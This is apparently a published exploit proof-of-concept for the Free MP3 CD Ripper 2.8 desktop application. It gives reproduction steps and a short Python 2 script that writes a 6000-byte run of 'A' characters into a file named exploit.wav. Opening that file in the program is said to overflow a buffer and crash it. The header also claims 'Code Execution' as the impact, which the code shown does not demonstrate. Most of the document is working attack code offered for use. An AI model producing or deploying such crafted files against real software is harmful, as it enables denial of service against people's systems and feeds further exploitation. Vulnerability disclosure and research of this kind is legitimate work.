#Exploit Title : Free MP3 CD Ripper 2.8 Buffer Overflow (DOS) #Date: 23-08-2019 #Vulnerable Software: FREE MP3 CD RIPPER 2.8 Build 20140611 #Vendor Home Page: www.cleanersoft.com/ #Software Link: www.cleanersoft.com/cd_ripper/free_cd_ripper.html #Tested On: Windows 7 (64Bit) #Attack Type : Denial of Service #Impact : Code Execution #Tested Version - 2.8 #Author - Malav Vyas #Twitter - @malav_vyas1 #Contact - malavvyas98@gmail.com """ Steps to reproduce [1] Run this python file and generate exploit.wav file [2] Open Free Mp3 CD ripper on target and click on convert button [3] select exploit.wav file [4] w00t!! Application should crash, resulting in Denial of service """ #!/usr/bin/python buffer = "A" * 6000 payload = buffer try: f=open("exploit.wav","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"